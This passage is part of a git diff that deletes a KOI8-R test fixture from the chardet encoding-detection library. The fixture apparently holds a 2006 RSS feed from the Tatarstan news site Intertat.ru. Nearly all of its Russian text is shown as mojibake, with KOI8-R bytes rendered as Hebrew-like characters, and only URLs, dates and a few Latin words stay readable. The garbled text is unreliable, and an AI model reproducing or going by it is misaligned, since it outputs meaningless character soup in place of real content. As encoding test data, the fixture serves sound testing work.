װױֱֹֻֽׂ. ן־ֱ װֿײֵ, ֱֻֻ ֹ ןּֿׂ׳, ׃ ֿ׃װֿׂ׳ֱ ף׀ֳֵֵ׃... - - - - diff --git a/chardet/tests/KOI8-R/intertat.ru.xml b/chardet/tests/KOI8-R/intertat.ru.xml deleted file mode 100644 index 0a051fe..0000000 --- a/chardet/tests/KOI8-R/intertat.ru.xml +++ /dev/null @@ -1,6 +0,0 @@ - - -עֵ׃׀ױֱֲֹֻּ־׃ֱֻׁ ֵֻּװֿׂ־־ֱׁ ֱֵַװֱ Intertat.RUץִֵֹׂװֵֵּֽ במן עח Intertat.RU ׁ׳ֵּׁװ׃ׁ ֱֲֹֻ־ֵװ םֹ־ֹ׃װֿׂ׳ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־. "Intertat.RU" ׃ֱִֿ־ֱ נֿ׃װֱ־ֿ׳ֵּ־ֵֹֽ נֱׂ׳ֹװֵּ״׃װ׳ֱ עֵ׃׀ױֲֹֹֻּ פֱװֱׂ׃װֱ־ ׃ֱַּֿ׃־ֿ ץֱֻױ נִֵֵֹׂ־װֱ עפ ׳ 2001 ִַֿױ. תֱֵַֹׂ׃װֹֿׂׂ׳ֱ־ֿ םֹ־ֹ׃װֵׂ׃װ׳ֽֿ ׀ֱֵװֹ ֹ װֱִֵֵֹּֿׂ׳ֱֵ־ֹׁ עז. ף׳ִֵֹװֵּ״׃װ׳ֿ ֿ ֵַֹׂ׃װֱֳֹֹׂ ףםי ּ ¹ 77-6112 ֿװ 22 ֵֶ׳ֱּׁׂ 2002 ַ. ףֱװ ׳ִָֹֿװ ־ֱ װֵָׂ ֱָֻׁ: ׂױ׃׃ֻֽֿ, ֱ־ַֹּ׃ֻֽֿ ֹ װֱװֱׂ׃ֻֽֿ. פֱװֱׂ׃ֹֻ ׀ִֵׂ׃װֱ׳ֵּ־ ֳֵֹֹֹֻּּׂ ֹ ֱּװֹ־ֳֵֹ. וײִֵ־ֵ׳־ֿ ־ֱ ׃ֱװֵ ֱֱֵֵֽׂװ׃ׁ ִֿ 100 ׃ֲֵֿֿ־ֹ. "Intertat.RU" - ֲֵֿ׃װ׳ֵ־־ֿ-׀ֹּֿװֵֹ׃ֵֻֿ ֱִֹ־ֵֹ, ֿ׃׳ְֱֵֵֵ ׀ֹּֿװֹֻױ, ֻֿ־ֹֻֽֿױ, ֻױּ״װױׂױ ֹ ִׂױֵַֹ ׃ֲֿװֹׁ ׳ עֵ׃׀ױֲֵֹֻּ פֱװֱׂ׃װֱ־ ֹ ׳ װֱװֱׂ׃ָֹֻ ֱִֹ׃׀ֱָֿׂ.http://intertat.ruעֵ׃׀ױֱֲֹֻּ־׃ֱֻׁ ֵֻּװֿׂ־־ֱׁ ֱֵַװֱ Intertat.RUhttp://www.intertat.ru/logo250x98.gifhttp://www.intertat.ru250עֵ׃׀ױֱֲֹֻּ־׃ֱֻׁ ֵֻּװֿׂ־־ֱׁ ֱֵַװֱ Intertat.RU98ק װֽֿ ִַֿױ ׳ ‏ֹ׃װֿ׀ֵּֿ ׳׀ױ׃װׁװ 10-ֹֹּּֽֿ־־ ׳ִֿֿ׃ֵװֹֻhttp://intertat.ru/index.php?id=80180מֱ׃װױ׀ֹ׳ֹ ִַֿ ׃װֱ־־ֹװ ׳ִ׳ֿ־ֵ ְֲֵֹּ־ֽ ִּׁ ֵֻֻּּֿװֹ׳ֱ ןןן «גֵװֱׂ», ִֵ׃װ׳ױְֵַֿ ׳ ׃ֿ׃װֱ׳ֵ ןבן «‏ֹ׃װֿ׀ּֿ״׃ֹֻ ֱ׃ֿ׳ֿ ֱ׳ִֿ «קֿ׃װֻֿ».Tue, 03 Jan 2006 14:55:30 +0300מֱ׃װױ׀ֹ׳ֹ ִַֿ ׃װֱ־־ֹװ ׳ִ׳ֿ־ֵ ְֲֵֹּ־ֽ ִּׁ ֵֻֻּּֿװֹ׳ֱ ןןן «גֵװֱׂ», ִֵ׃װ׳ױְֵַֿ ׳ ׃ֿ׃װֱ׳ֵ ןבן «‏ֹ׃װֿ׀ּֿ״׃ֹֻ ֱ׃ֿ׳ֿ ֱ׳ִֿ «קֿ׃װֻֿ». כ ׀ֵׂ׳ֽֿױ ׃׳ֵֽֿױ ֲּֿ״ֽֿױ ְְֲֵֹּ - 10-ֵּװְֹ ׃ֿ ִ־ׁ ֿ׃־ֿ׳ֱ־ֹׁ ֶֹֽׂ ֲֵװֱֿׂ׳ֳ ַֿװֿ׳ׁװ ִֿ׃װֿ־ ׀ֱִֻֿֿׂ - ׳׀ױ׃ֻ 10-ֹֹּּֽֿ־־ַֿֿ ׳ִֿֿ׃ֵװֱֹֻ. ףֲֿװֵֹ װֿ ׀ִֵֹֿֿׂװ ׳ ְֹ־ֵ, ־ֿ ֻ ־ֵֽױ ֱ׳ֱִֿ־ֵ ַֿװֿ׳ׁװ׃ׁ ׃ ֿ׃ֲֽֿ ־ֱ׃װֵֿׂ־ֵֹ. ףֱֵ׃ װׂױִ־ֿ ׳ װֿ ׀ֿ׳ֵֹׂװ״, ־ֿ ֱִַֻֿ ֹ׃װֿ׀ּֿ״׃ֵֹֻ ֱ׃ֿ׳ֹֹֻ ֱִױֱֹּֽ ֱִֵּװ״ ׃ֵװֹֹֻ ׳ִֿ - ֵַֹֻּּֿ ֹ ִׂױַָֹ ֱ׃ֿ׳ָ ֱ׳ִֿֿ׳ ־ִֵֿױֵֽ׳ֱֹּ: ֱֵֽ? ‏ֱ׃ֿ׳ֱׁ ֿװֱׂ׃ּ״ ׀ֵֵׂײֹ׳ֱֱּ ־ֵ ּױֵֹ ׳ֵֵֽׂ־ֱ, ׀ֹֿׂ׳ִֿ׃װ׳ֿ ־ֱׂױ־ָ ֹ ׀ָֹֿׂ ָֿׂ־ֵֽֿװֿׂ׳ ׀ֿ׳׃ֵֵֽ׃װ־ֿ ׀ֱֱִּֿ, ֱ ֵַ־ֱֵּׂ״־ ִֵֹֻׂװֿׂ ‏ֹ׃װֿ׀ּֿ״׃ַֻֿֿ ֱ׳ֱִֿ קֱִֹּ׃ֱּ׳ דֹ׳ֹֹּ־ ־ֿ׃ֹּ׃ׁ ׃ ִֵֵֹ ׳׀ױ׃ֱֻ ־ֹֻֽֿױ, ֱֻֻ װֱִַֿ ֱֱֻּֿ׃״, ׀ֱֲֹֿׂׂ ױֵװֱ ֱׂ׃ִָֿױֵֽֿ ׳ִֿ. קֵֽׁׂ ׀ֱֱֻּֿֿ, ֻװֿ ׀ֱׂ׳. עֱֵֶֽֿׂ צכט ׀ֿװֲֵֿׂ׳ֱֱּ ֽ־ֿײֵ׃װ׳ֿ ׀ֲֹֿֿׂׂ׳ ױֵװֱ ֱׂ׃ִָֿֿ׳ֱ־ֹׁ ִָּֿֿ־ֿ ֹ ֵַֿׁׂ ׳ִֿ, ֱֱַ, ֵֻּװֿׂ־ֵַֹֹׂ. ק׃ֵ װֹ ׃ֵװֹֹֻ ׳ ֱׂ־ֵֿ ׳ֵֽׁׂ ־ֱֱֹּ ֱִֵּװ״ ׳ ‏ֹ׃װֿ׀ֵּֿ ֹ ׀ִּֿֿׂײְֱװ ׃ ױ׃׀ֵָֽֿ ׳׀ױ׃ֱֻװ״ ׃ִֵַֿ־ׁ, ׀ֹׂ־ֱֿׂ׳ֹּ׳ֱׁ׃״ ֻ ׳׃ֵ ׳ֱֿׂ׃װְֱֹֽ װֲֵֿׂ׳ֱ־ֹֽׁ ׀ֿװֲֵֹׂװֵֵּ.פֱֻ, ֵ׃ֹּ ׀ֵׂ׳ ֹֹּּֽֿ־ ׳ִֿֿ׃ֵװֹֻֿ׳ ֲּ ׳׀ױֵ־ ֱ ִ׳ֱ ׃ ׀ּֿֿ׳ֹ־ֿ ֱִַֿ, װֿ װֵ׀ֵׂ״ ִֵ׃״ ׳׀ױ׃ְֱֻװ ׀ֿ ִ׳ֱ ֹֹּּֽֿ־ֱ ׃ֵװֹֻֿ׳ ֱׂ׃ֱִָֿ ׳ִֿ ׳ ִַֿ, ׀ֵֹֽׂ, ־ֵ ִֿ־ֿ, ֱֻֻ ֱׂ־״ֵ, ֱ ֲֵֵּֿ ֵֽ ִֵ׃ׁװֱֻ ֱׂ־ֿ׳ִֹ־ֿ׃װֵ. ב ׃׀ֿׂ׃ ־ֱ ־ָֹ ׳׃ֵ ֱׂ׃װֵװ. גױֻ׳ֱּ״־ֿ ׳ ֱֻ־ױ־ ־ֿ׳ַֿֿ 2006 ֱִַֿ ׳ ןןן «גֵװֱׂ» ֱ׀ױ׃װֹֹּ ׳ ֱֲֿׂװױ ֹ ֹ׃׀װֱֹּ ׃׀ֱֳֵֹּ״־ ׀ֹּֿׂ׳־ ׃װֵ־ִ, ֻֿװֿׂ ׀ֿ׳ֵּֿׁװ ֲִֹֿװ״׃ׁ ֵֿ־״ װֿ־ָ ׀ֱֱֻֿװֵֵּ ׀ֱֲֹֿׂׂ ֱׂ׃ִָֿֿ׳ֱ־ֹׁ ִָּֿֿ־ֿ ֹ ֵַֿׁׂ ׳ִֿ. ף׀ֱֳֵֹֹּ׃װ ױװ׳ֵׂײְֱִװ, װֿ ׃װֵ־ִ ׃ֿֿװ׳ֵװ׃װ׳ױֵװ ּױֹֽ ֵ׳ֿׂ׀ֵ׃ֹֻֽ ֱֱֲֳֽֿׂ ֹ ֱִײֵ ׀ֵׂ׳ֿ׃ִָֹֿװ ָֹ ׀ֿ ִׁׂױ ׀ֱֱֵֽׂװֿׂ׳. פֱֻ װֿ ׳׀ױ׃ֻ ׳ִֿֿ׃ֵװֹֻֿ׳ ׀ֿ ֵ׳ֿׂ׃װֱ־ֱִׂװֱֽ ִֵ׃״ ױײֵ ֱֱַׂ־װֹֿׂ׳ֱ־. ‏ֹ׃װֿ׀ּֿ״׃ֵֹֻ ׀ֲֹֿׂׂ ָֿֿװ־ֿ ׀ֻֿױ׀ְֱװ ֱֻֻ ׳ עֿ׃׃ֹֹ, װֱֻ ֹ ֱׂױֲֵײֽֿ. ק׃ֱֵֵֿ ֱֵֻ׃װ׳ֿ, ־ֵ׳׃ֱֻֿׁ ֳֵ־ֱ ֹ ֹֽ־ֱֹװְׂ־ֿ׃װ״ ׀ֱֲֹֿׂׂ - ׳ֿװ ׳ ֵֽ ֱַּֿ ױ׃׀ֱֵָ. כ׃װֱװֹ, ֵ׃װ״ ֱִײֵ ׀ֲֹֿׂׂ ׃ ִֹ׃װֱ־ֳֹֿ־־ֽ ױ׀ֱׂ׳ֵּ־ֵֹֽ, ֱ, ֵֻֽֿׂ װַֿֿ, ִֵ׃״ ײֵ ְֱִֵּװ ֵַׂױּׁװֿׂ ֱִ׳ֵּ־ֹׁ ׳ִֿ, ׃ֿ׳ֵֵֽׂ־־ױְ ֱ׀ֿׂ־ױְ ֱֱֽׂװױׂױ, ֱֵֵֹֻֽׂ׃ֵֹֻ ֱֻׂ־ ֹ װ.׀. וֵ ִֿ־ֱ ֹ־װֵֵׂ׃־ֱׁ ־ֿ׳ֹ־ֱֻ «גֵװֱֱׂ», ֿ ֻֿװֿֿׂ Intertat.ru ׃ֲֹּֿֿ ׀ִֵׂ׃ֱִֵװֵּ״ ׃ֿ׳ֵװֱ ִֵֹֻׂװֿֿׂ׳ ןבן קֱִֹֹּֽׂ תֱֳֵ׳, - ֱַֿ׳ֵ ׃ֵװֹֹֻ ׀ֿׂ׀ױ׃ֻ־ֿ ׃׀ֿ׃ֲֿ־ֿ׃װ״ְ 1,6 ֻױֲ.ֽ./. ן־ֹ ־ֵ ֿ׃װֱ׳ׁװ ֱׂ׳־ִֿױ־ֹֽ װֵָ, ֻװֿ ֹ׃׀ּֿ״ױֵװ ֱַ ־ֵ װּֿ״ֻֿ ִּׁ ֻױָֿ־־ָ ׀ֹּװ, ־ֿ ֹ ִּׁ ֲֵַֿֿׂ׳ֱ ׀ֵֵֽֿ־ֹ ׃ ׀ֽֿֿ״ְ ׳ִֿֿ־ֱֵַׂ׳ֱװֵּ״־ָ ֻֿװּֿ׳. הֵּֿ ׳ װֽֿ, װֿ ֱׂ־״ֵ ִֵ׃״ ׳׀ױ׃ֱֹֻּ ֲװֿ׳ֵ ֱַֿ׳ֵ ׃ֵװֹֹֻ ׀ֿׂ׀ױ׃ֻ־ֿ ׃׀ֿ׃ֲֿ־ֿ׃װ״ְ 1,2 ֻױֲ.ֽ./, ׀ִֵׂ־ֱ־ֱֱ׳ֵֹ׃ׁ װּֿ״ֻֿ ִּׁ ֻױָֿ־־ָ ׀ֹּװ. ן־ֹ ֹ ׃ִֵַֿ־ׁ ׀ּֿ״ױְװ׃ׁ ֲּֿ״ֿ ׀ֿ׀ױּׁׂ־ֿ׃װ״ְ, ׁ׳ּׁׁ׃״ ׃ֱֹֽֽ ֹֽ־ֱֹװְׂ־ֹֽ ֹ ׳׃ֵָ ֿװֵֵ׃װ׳ֵ־־ָ ִֵֹֹּ װֱַֻֿֿ ֱִֿׂ. פֱֻ ׳ֿװ ־ֿ׳ֵ ֵֻּװֿׂ־־ֿ-ֱֵָֽ־ֵֹ׃ֵֹֻ ֲװֿ׳ֵ ׃ֵװֹֹֻ ֱֱַ, ֱֱֲִּֿׁ ֲּֿ״ֵ ׀ִָֹֽֿֿֿׂ׃װ״ְ, ױװ״ ֹּ ־ֵ ׳ִ׳ֵֿ ֵֽ־״ֵ ׃׳ָֹֿ ׀ִֵֵׂ׃װ׳ֵ־־ֹֻֿ׳ - ֵַֿ ֱֵֽׂׂ, ֱֻֻ ױ ֲֹּֽֿ״־ַֿֿ װֵֵֶּֿ־ֱ. ץֱֹֻׂ־׃ֱֻׁ ֲֹֿ־ֱ כֱֱ־ֹ ַֿװֿ׳ֹװ׃ׁ ֿװֵֽװֹװ״ עֿײִֵ׃װ׳ֿ ׃ ֱֱָֽֽֿׂhttp://intertat.ru/index.php?id=80179ק ־ֿ״ ׃ 6 ־ֱ 7 ׁ־׳ֱׁׂ ִֵּֽֿֿײ״ ֹ ֹ׃ֱּ ֵֽ׃װ־ֿ ױֱֹֻׂ־׃ֻֿ ־ֱֳֹֿ־ֱּ״־ֿ-ֻױּ״װױׂ־ֿ ֱ׳װֿ־ֹֹֽֿ כֱֱ־ֹ ֲױִֵװ ׃װױֱװ״׃ׁ ׳ ִ׳ֵֹׂ ֻ׳ֱׂװֹׂ ֹ ֹ׃׀ּֿ־ׁװ״ ִֹֻֻּֿׁ - ׀ֵ׃־ֿ׀ֵ־ֹׁ ׃ ׀ֱִֿׂ׳ֵּ־ֹֹֽׁ ׃ עֿײִֵ׃װ׳ֽֿ.ֲֵֿ׃װ׳ֿTue, 03 Jan 2006 14:29:56 +0300ק ־ֿ״ ׃ 6 ־ֱ 7 ׁ־׳ֱׁׂ ִֵּֽֿֿײ״ ֹ ֹ׃ֱּ ֵֽ׃װ־ֿ ױֱֹֻׂ־׃ֻֿ ־ֱֳֹֿ־ֱּ״־ֿ-ֻױּ״װױׂ־ֿ ֱ׳װֿ־ֹֹֽֿ כֱֱ־ֹ ֲױִֵװ ׃װױֱװ״׃ׁ ׳ ִ׳ֵֹׂ ֻ׳ֱׂװֹׂ ֹ ֹ׃׀ּֿ־ׁװ״ ִֹֻֻּֿׁ - ׀ֵ׃־ֿ׀ֵ־ֹׁ ׃ ׀ֱִֿׂ׳ֵּ־ֹֹֽׁ ׃ עֿײִֵ׃װ׳ֽֿ. כֱֻ ׃ֲֹּֿֿ ׀ִֵׂ׃ֱִֵװֵּ״ ֱ׳װֿ־ֹֹֽֿ קֱִֹֹּֽׂ לְֲֵ־ֻֿ, 7 ׁ־׳ֱׁׂ ׳ הֵֽֿ הׂױײֲ ־ֱִֿֿׂ׳ ױֱֹֻׂ־׃ֱֻׁ ֲֹֿ־ֱ כֱֱ־ֹ ֿװֵֽװֹװ ׀ֱִׂ־ֹֻ עֿײִֵ׃װ׳ֱ, ־ֱ ֻֿװֿׂ ׀ֱֵַֹּׂ־ ׀ִֵׂ׃װֱ׳ֹװֵֹּ ֱ׀׀ֱֱׂװֱ נִֵֵֹׂ־װֱ עפ, ִַֿֿׂ׃ֻֿ ֱִֹֽ־ֹ׃װֱֳֹֹׂ, ִׂױַָֹ ־ֱֳֹֿ־ֱּ״־ֿ-ֻױּ״װױׂ־ָ ֱ׳װֿ־ֹֽֿ פֱװֱׂ׃װֱ־ֱ. ק ֱֱָֻֽׂ ׀ֱִׂ־ֱֹֻ ׃ֿ׃װֹֿװ׃ׁ װֱֵװֱֹּֿׂ׳ֱ־־ֵֿ ׀ִֵׂ׃װֱ׳ֵּ־ֵֹ ׀ֿ ֽֿװֹ׳ֱֽ ׀ֹֿׂ׳ִֵֵ־ֹׁ מ.חַּֿֿׁ «מֿ״ ׀ִֵֵׂ עֿײִֵ׃װ׳ֽֿ» ׳ ֹּֿײֵ־ֹֹ ׃ֿ׳ֵֵֽׂ־־ַֿֿ ױֱֹֻׂ־׃ַֻֿֿ ׀ֿװֱ, ־־ֵ ׀ֿׂײֹ׳ְֱֵַֿ ׳ כֱֱ־ֹ, קֱֵֹּׁׂ נּֿװֱ׳ֱֳ ֹ ׳ ׀ֿ׃װֱ־ֿ׳ֵֻ ׀ֵׂ׀ֱִֿ׳ֱװֵּׁ ױֱֹֻׂ־׃ַֻֿֿ ֿװִֵֵּ־ֹׁ כֱֱ־׃ֻֿ ֽ־ַֿֿ־ֱֳֹֿ־ֱּ״־ֿ ׳ֿ׃ֵֻׂ׃־ֿ ֻּֿ פֱװ״ׁ־ טֱ־ֿ׳ֿ. עֿײִֵ׃װ׳ֵ־׃ֵֹֻ ִֹֻֻּֿׁ, ֱֻֻ ֱׂ׃׃ֱֱֻּ קֱִֹֹּֽׂ לְֲֵ־ֻֿ, ֲױִױװ ֹ׃׀ּֿ־ׁװ״ ־ֵ װּֿ״ֻֿ ױֱֹֻׂ־׃ֵֹֻ ִֵװֹ. נִֵׂ׃װֱ׳ֹװֵֹּ ֵֽ׃װ־ַֿֿ ה׳ֹײֵ־ֹׁ ױֱֹֻׂ־׃ֻֿ ִֵּֽֿֿײֹ ׀ֿ ֹ־ֱֳֹֹװֹ׳ֵ ׀ִֵׂ׃ֱִֵװֵּׁ ִ׳ֹײֵ־ֹׁ הֹֽװֹׁׂ םֵֹ־ֻֿ ־ֱ ִ׳ױָ ֱ׳װֱֹֽֿ־ֱָ ׀ִֵֿױװ ׀ֿ ֱִֽֽֿ ׀ֱִֿׂ׳ּׁװ״ ׃ עֿײִֵ׃װ׳ֽֿ ׳ֵװֱֵׂ־ֿ׳. ב־ֱַֹּֿ־ֵ ֵֽֿׂ׀ֹׁׂװֹׁ ׀ִֿׂױװ ׳ ִׂױַָֹ ֱִַָֿֿׂ ֵׂ׃׀ױֲֹֹֻּ, ׳ ֱ׃װ־ֿ׃װֹ, ׳ מֹײ־ֱֵֻֽ׃ֵֻ ֹ מֱֲֵֵׂײ־ָ ‏ֵּ־ֱָ.כ־ֱַֹ ֿ װ׳ֵֿׂ׃װ׳ֵ ׳ ׃װֵֹּ «־ֱִֿׂ־ַֿֿ י׃ֱֱּֽ»http://intertat.ru/index.php?id=80177כֱֱ־׃ֵֻֿ ֱִֹװֵּ״׃׳ֿ «יֱֽ־» ׳׀ױ׃װֹּֿ ׳ ׃׳ֵװ ֻ־ַֹױ «גֱֱַּױֱַׂ ֱֱֲַּױ» - «נֿ׃׳ֵׁ־ֵֹ» ֿ ׃׀ֳֵֵֶֹֹ׃ֻֽֿ ־־ֵ ֹ׃ְֱֵֵֽ ײֱ־ֵׂ ־ֱִֿׂ־ַֿֿ װ׳ֵֿׂ׃װ׳ֱ ׳ ׃װֵֹּ װֱֻ ־ֱ׳ֱֵַֽֿֿ «־ֱִֿׂ־ַֿֿ י׃ֱֱּֽ».ֻױּ״װױֱׂTue, 03 Jan 2006 14:09:11 +0300כֱֱ־׃ֵֻֿ ֱִֹװֵּ״׃׳ֿ «יֱֽ־» ׳׀ױ׃װֹּֿ ׳ ׃׳ֵװ ֻ־ַֹױ «גֱֱַּױֱַׂ ֱֱֲַּױ» - «נֿ׃׳ֵׁ־ֵֹ» ֿ ׃׀ֳֵֵֶֹֹ׃ֻֽֿ ־־ֵ ֹ׃ְֱֵֵֽ ײֱ־ֵׂ ־ֱִֿׂ־ַֿֿ װ׳ֵֿׂ׃װ׳ֱ ׳ ׃װֵֹּ װֱֻ ־ֱ׳ֱֵַֽֿֿ «־ֱִֿׂ־ַֿֿ י׃ֱֱּֽ». כ־ֱַֹ ־ֱ׀ֹ׃ֱ־ֱ ֱֻ־ֱִִֹװֽֿ ֹ׃ֻױ׃׃װ׳ֿ׳ִֵֵ־ֹׁ חױֵּ״ְ ףֱֶױֹּּ־ֿ, ֻֿװֱֿׁׂ ׃ֱֵ׃ ײֹ׳ֵװ ֹ ֱֲֿׂװֱֵװ ׳ י׃ֱּֽֿ׳ִֵֵ׃ֻֽֿ ֳֵ־װֵׂ ַ. ץװֵָׂװ (חֱּּֿ־ִֹׁ). כֱֻ ׀ֿׁ׃־ֹּ ׀ֵׂ׳ ֱֵֽ׃װֹװֵּ״ ׀ִֵׂ׃ֱִֵװֵּׁ הױָֿ׳־ַֿֿ ױ׀ֱׂ׳ֵּ־ֹׁ ֽױ׃ױּ״ֱֽ־ פֱװֱׂ׃װֱ־ֱ קֱֹּױֱּּ ֱֱָׂװ סֻױ׀ֿ׳ ׃ױװ״ װ׳ֵֿׂ׃װ׳ֱ ׳ ׃װֵֹּ ֹ»־ֱִֿׂ־ַֿֿ י׃ֱֱּֽ» ְֱֱֵֻּװ׃ׁ ׳ װֽֿ, װֿ ֽױ׃ױּ״ֱֽ־ֹ־ ׀ּֿ־ֿ׃װ״ְ ׀ֹֿׂװֱ׳ֹ כֱֿׂ־, ׳׀ֱׂ׳ֵ ֱֲֿׂװֹװ״׃ׁ ֻ ק׃ֵ׳־ֵֽױ בֱָּּױ ֱ ׳ֿ־ֱֱַׂײִֵ־ֵֹֽ ׳ ׳ִֵֹ ֱֱֻֿ־ֹׁ ֹּֽֿ׃װֵ נֻֿֿׂׂױ םֱִֵָֽֽֿױ, ֽױ׃ױּ״ֱֽ־׃ֹֻֽ ׃׳ׁװֽ, ׃׳ֹֽֿ ױֵֹֽֽׂ ׀ֱִֵֻֽׂ ֹ ֱִײֵ ־־ֵ ֱִׂ׳׃װ׳ױְֹֽ ִֿׂ׃װ׳ֵ־־ֱֹֻֽ. ןֲ־ֿ װֱֵֹֻ ֱֲֵֿׂ־ֹׁ ֻ בֱָּּױ ׃ֱֱַֹּּ׃״ ׳ ֵֶֽֿׂ ׃װָֹֿ׳ ֹ ׀ֵ׃ֵ־ ־ֱ ֱֽ־ֵׂ ֹּֽֿװ׳. כ־ֱַֹ חױֵֹּ ףֱֶױֹּּ־ֿ ־ֱ׀ֹ׃ֱ־ֱ ־ֱ װֱװֱׂ׃ֻֽֿ ֹ ׂױ׃׃ֻֽֿ ֱָֻׁ, ׃ִֵֿׂײֹװ ֲֵֵּֿ ׃װֱ ׃װֱׂ־ֳֹ ֹ ְֹּּ׃װֹֿׂׂ׳ֱ־ֱ ֶֿװֱֶַֹֹֽֿׁׂ װֵָ, ׳ ֲּֿ״ֹ־׃װ׳ֵ ׀ֿײָֹּ ֽױ׃ױּ״ֱֽ־, ױ ֻֿװָֿׂ ֿ־ֱ ׳ װֵֵ־ֵֹ 15 ֵּװ ׃ֱֱֲֹּֿׂ ֱֲֳֿׂ װַֿֿ װ׳ֵֿׂ׃װ׳ֱ. מֱ װֱװֱׂ׃ֻֽֿ ֵֻׁ ֹּֿײֵ־ ׀ֵֹֽׂׂ ֱֲֵֿׂ־ֹ ֻֿ ק׃ֵ׳־ֵֽױ, ֱ ־ֱ ׂױ׃׃ֻֽֿ ־ֱ׀ֹ׃ֱ־ ֱ־ֱֹּװֵֹ׃ֹֻ ֱִֵּׂ ֻ־ַֹֹ. עֱֶֹ׃ גױֱַׂ־ֿ׳ ֹ יֱׂװ םֹ־ֹֻ־ ֱֲֵָֹּֿ ׀ֿ׃ֵֹֻּ כֹֿׂ׳׃ַֻֿֿ ֱֿׂ־ֱ כֱֱ־ֹhttp://intertat.ru/index.php?id=80176ףִֵַֿ־ׁ ֹ׃׀ּֿ־ְֹׁ ֱֲֿׁ־־ֿ׃װֹ ֱַּ׳ ֽױ־ֳֹֹ׀ֱּ״־ַֿֿ ֱֲֿֿׂ׳ֱ־ֹׁ ַ. כֱֱ־״ עֱֶֹ׃ גױֱַׂ־ֿ׳ ֹ ֱֵֽ׃װֹװֵּ״ ֱַּ׳ ֱִֹֽ־ֹ׃װֱֳֹֹׂ כֱֱ־ֹ יֱׂװ םֹ־ֹֻ־ ׃ֿ׳ֵֹֹּׂ ֱֲֿׂױְ ׀ִֵֻֿױ ׀ֿ ׀ֿ׃ֱֵֻּֽ כֹֿׂ׳׃ַֻֿֿ ֱֿׂ־ֱ ׃װֳֹּֿ ֵׂ׃׀ױֲֹֹֻּ.Tue, 03 Jan 2006 13:57:38 +0300ףִֵַֿ־ׁ ֹ׃׀ּֿ־ְֹׁ ֱֲֿׁ־־ֿ׃װֹ ֱַּ׳ ֽױ־ֳֹֹ׀ֱּ״־ַֿֿ ֱֲֿֿׂ׳ֱ־ֹׁ ַ. כֱֱ־״ עֱֶֹ׃ גױֱַׂ־ֿ׳ ֹ ֱֵֽ׃װֹװֵּ״ ֱַּ׳ ֱִֹֽ־ֹ׃װֱֳֹֹׂ כֱֱ־ֹ יֱׂװ םֹ־ֹֻ־ ׃ֿ׳ֵֹֹּׂ ֱֲֿׂױְ ׀ִֵֻֿױ ׀ֿ ׀ֿ׃ֱֵֻּֽ כֹֿׂ׳׃ַֻֿֿ ֱֿׂ־ֱ ׃װֳֹּֿ ֵׂ׃׀ױֲֹֹֻּ.ק ׀ִֵֵֻֿ, ֳֵּ״ְ ֻֿװֿֿׂ ֲּֿ ֿ־ֱֵֻּֽֿ־ֵֹ ׃ ־ֱ׃ױ־ֹֽ ׀ֱֲֵֹּֽֽֿׂ ׀ֿ׃ֵֻּֿ׳, װֱֻײֵ ׀ֹׂ־ֹּׁ ױֱ׃װֵֹ ֱֵֽ׃װֹװֵּ״ ֱַּ׳ ֱִֹֽ־ֹ׃װֱֳֹֹׂ כֱֱ־ֹ םֱ־׃ױׂ טֱֶֹֿ׳ ֹ ֱַּ׳ֱ כֹֿׂ׳׃ַֻֿֿ ֱֿׂ־ֱ בֵֻּ׃ֱ־ִׂ גֱֵׂ׳.צֹ־״ ׀ֿ׃ֵֻּֿ׳ ־ֵ ֽֿײֵװ ־ֵ ׳ּֿ־ֿ׳ֱװ״ ־ֿ׳ָ ׂױֻֿ׳ִֹֿװֵֵּ ֱִַֿֿׂ, ׳ִֵ״ ָֹ ־ֱ׃ֵֵּ־ֵֹ - 267 װ׃ׁ ֵּֿ׳ֵֻ, ֹ, ־ֱֹװ, ׀ֱֻׂװֵֹ׃ֹֻ ֱֻײִ ֵװ׳ֵׂװ ֱֱֻ־ֳֵ ׀ֿׂײֹ׳ֱֵװ ׳ ׳ִֵָֹֿ ׳ ֵׂװױ ֱִַֿֿׂ ׀ֿ׃ֱֵָֻּ.ק כֹֿׂ׳׃ֻֽֿ ֱֿׂ־ֵ 12 ׀ֿ׃ֵֻּֿ׳. נֵׂ׳ ־ֱ ׀ױװֹ ױֱ׃װ־ֹֻֿ׳ ֱִֵׂ - תֱֵּ׃־. נֿ׃ֵּ ׳ֹױֱּ״־ַֿֿ ֿ׃ֽֿװֱׂ, ׳׃װֱֵׂ ׃ ׂױֻֿ׳ִֹֿװֵֵּֽ ֵֽ׃װ־ֿ ױ׀ֱׂ׳ קֹֻװֽֿֿׂ ףֱֹּֽ־ֽ.«ףִֵֹׂ ֿ׃־ֿ׳־ָ ׀ֲֵּֽֿׂ װֵ, װֿ ׃׳ֱׁ־ ׃ ֵֻֿׂ־׃װׂױֳֵֹֻ חֿׂ״ֻֿ׳׃ַֻֿֿ ֿ׃׃ֵ, ׃ֱֱֻּ קֹֻװֿׂ ףֱֹּֽ־. מֲִֵָֹֽֿֿֿ ֱ׳ֵֹׂװ״ ׃װֹֿׂװֵּ״׃װ׳ֿ ִֿ־ַֿֿ ֹ ִ׳ױָ ׀ִֵֽֿ־ָ ׀ִֵֵָֿֿׂ׳. ב ׳ ִׂױַֽֿ - ־ֱ׀ֿׂװֹ׳ ֱֱַֹֽ־ֱ «גֵָװֵּ» - ׃ֱִֵּװ״ ֿ׃׳ֵֵ־ֵֹ. נִֵֽֿ־ֵ ׀ִֵֵָֿׂ ֵֵׂ ֿײֹ׳ֵּ־־ױְ װֱׂ׃׃ױ ִּׁ ײֹװֵֵּ ׀ֿ׃ֱֵֻּ - ׳ ֲױֻ׳ֱּ״־ֽֿ ׃ֽ׃ֵּ ׳ֿ׀ֿׂ׃ ײֹ־ֹ. ֱֻּֿ ֱׂ׃׀ּֿֿײֵ־ֱ ־ֱ׀ֿׂװֹ׳ ײַֹּֿֿ ֱֽ׃׃ֹ׳ֱ, ֹ ֱֻײִ ֱׂ ֻּֿ״־ֱֹֻֽ ׀ִָֹֹֿׂװ׃ׁ ׀ִֵֵָֹֿׂװ״ ֿ׃׃ֵ ׃ ־ֱֵּֽֽ ֹׂ׃ֻֽֿ.חֱּ׳ֱ םףץ ֱ׳ֵֹּׂ, װֿ ֿ׃׳ֵֵ־ֵֹ ׳ ִֿ־ֽֿ ֹ ׀ִֵֵָֿֿׂ׳ ֲױִֵװ ׃ֱִֵּ־ֿ ױײֵ ׳ ׁ־׳ֱֵׂ. מֿ ׀ֲֵּֽֿׂױ ֻֿֿ־ֱװֵּ״־ֿ ֽֿײ־ֿ ֲױִֵװ ֵֹׂװ״ װּֿ״ֻֿ ׃ֿ ׃װֹֿׂװֵּ״׃װ׳ֽֿ 